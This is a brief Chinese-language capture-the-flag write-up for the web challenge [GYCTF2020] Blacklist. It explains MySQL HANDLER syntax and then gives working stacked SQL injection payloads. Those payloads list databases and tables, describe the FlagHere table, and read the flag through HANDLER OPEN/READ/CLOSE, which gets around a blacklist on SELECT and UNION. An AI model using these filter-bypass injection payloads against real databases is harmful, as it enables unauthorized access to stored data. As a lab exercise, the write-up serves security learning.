buuct(web):[GYCTF2020]Blacklist
知识点:
desc查看表结构的详细信息,按照降序排列并输出
该HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问。这个表对象不被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭 。
HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...) [ WHERE where_condition ] [LIMIT ... ] HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST } [ WHERE where_condition ] [LIMIT ... ] HANDLER tbl_name READ { FIRST | NEXT } [ WHERE where_condition ] [LIMIT ... ] HANDLER tbl_name CLOSE
很明显这是一道sql注入
先手工试一下,order by可以使用,但是到了联合查询时union select,发现被过滤了。
试一试堆叠注入
使用命令: 1';show database;
可以查出这么多库
使用命令:1';show tables;
好像看到了flag存放的表。
接着查询字段,使用命令:1';desc `FlagHere`#
查询数据,因为select无法使用,可以用handler进行代替
使用命令:1'; HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#
得到flag
